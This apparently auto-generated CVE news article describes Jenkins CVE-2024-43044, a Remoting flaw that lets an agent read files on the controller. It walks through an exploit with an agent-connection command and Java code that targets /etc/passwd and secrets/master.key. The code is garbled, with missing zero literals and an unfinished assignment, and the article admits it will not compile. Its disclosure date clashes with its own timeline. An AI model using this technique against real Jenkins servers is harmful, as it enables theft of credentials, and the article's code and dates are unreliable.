CVE CyberSecurity Database News

CVE-2024-43044 - Critical Jenkins Remoting Vulnerability Allows Agent File Read – How It Works and Exploit Details

Poster -

On May 15, 2024, the Jenkins team disclosed a severe vulnerability tracked as CVE-2024-43044. This flaw affects Jenkins 2.470 and earlier, and LTS 2.452.3 and earlier, enabling malicious Jenkins agents to read any file from the Jenkins controller file system. The root cause? Misuse of the ClassLoaderProxy#fetchJar method in the Remoting library. In this deep dive, we'll break down what happened, explain the exploit with code snippets, and link to key references.

What Is Jenkins Remoting?

Jenkins Remoting is the communication library used for the controller-agent architecture. Jenkins agents, whether running on build nodes, cloud VMs, or physical hardware, rely on "Remoting" to talk to the Jenkins controller.

What’s Vulnerable in Jenkins?

In Jenkins 2.470 and earlier (and their corresponding LTS branches), there’s a design bug in the way controller and agent communicate. The method ClassLoaderProxy#fetchJar allows an agent to request the content of any file on the controller, simply by specifying a relative path. There’s NO sandboxing or path validation!

Exploiting CVE-2024-43044: Step by Step

Let’s walk through the exploit theoretically (only for educational and defensive purpose).

1. Connect an agent

Suppose you're running your own agent (legit or compromised), connect it to the Jenkins controller. You can use the standard Jenkins agent JAR for this:

java -jar agent.jar -jnlpUrl http://jenkins-controller/computer/agent-node/slave-agent.jnlp -secret <secret>

2. Send a custom Remoting request

Write a Java program that abuses the ClassLoaderProxy#fetchJar method. Here’s a simplified illustration:

import hudson.remoting.Channel;
import hudson.remoting.ClassLoaderProxy;

import java.io.FileOutputStream;
import java.io.InputStream;

public class JenkinsAgentExploit {
    public static void main(String[] args) throws Exception {
        // Assume 'channel' is connected to the controller
        Channel channel = // obtain from agent context

        // ClassLoaderProxy fetches JAR (actually ANY file)
        ClassLoaderProxy proxy = new ClassLoaderProxy(channel, JenkinsAgentExploit.class.getClassLoader(), "my-agent");

        // Attempt to fetch /etc/passwd (or Jenkins secrets)
        String targetFile = "/etc/passwd"; // Or "../../secrets/master.key"
        InputStream in = proxy.fetchJar(targetFile);

        // Save output
        FileOutputStream out = new FileOutputStream("output.txt");
        byte[] buffer = new byte[4096];
        int len;
        while ((len = in.read(buffer)) > ) {
            out.write(buffer, , len);
        }
        in.close();
        out.close();

        System.out.println("File fetched from Jenkins controller!");
    }
}

Note: The above code won’t compile/run without the correct Remoting context, but demonstrates the core idea: fetch any file from the controller using Remoting calls.

3. What Can an Attacker Steal?

- secrets/*.key – Unlock all encrypted credentials in Jenkins.

Real-World Impact

If you run Jenkins with any (semi-)trusted agents, a malicious or compromised agent can instantly escalate into *full controller compromise*. All builds, secrets, and credentials are at risk. Even isolated build nodes aren’t safe.

Restrict filesystem permissions of Jenkins controller as much as possible.

Official Jenkins Security Advisory:
- https://www.jenkins.io/security/advisory/2024-05-15/#SECURITY-3373

Original CVE:
- https://nvd.nist.gov/vuln/detail/CVE-2024-43044

Summary Table

| Description | Details |
|--------------------------------------|-------------------------------------|
| CVE | CVE-2024-43044 |
| Affected | Jenkins 2.470-/LTS 2.452.3- |
| Component | Remoting / ClassLoaderProxy#fetchJar|
| Exploitability | Malicious or compromised agent |
| Impact | Read arbitrary files |
| Patch | 2.471 / LTS 2.452.4 |

Final Thoughts

CVE-2024-43044 is one of the most critical Jenkins vulnerabilities in recent years. If agents are not 100% trusted, or if you haven’t patched, you *may already be compromised*. Never allow untrusted nodes to connect to your Jenkins controller, and always update to the latest LTS or weekly release.

Stay safe, and patch now!

*For more info, always check the Jenkins Security Advisories.*

References

- Jenkins Security Advisory 2024-05-15
- CVE Details: CVE-2024-43044
- Jenkins Remoting Project

Timeline

Published on: 08/07/2024 14:15:33 UTC
Last modified on: 08/16/2024 17:19:30 UTC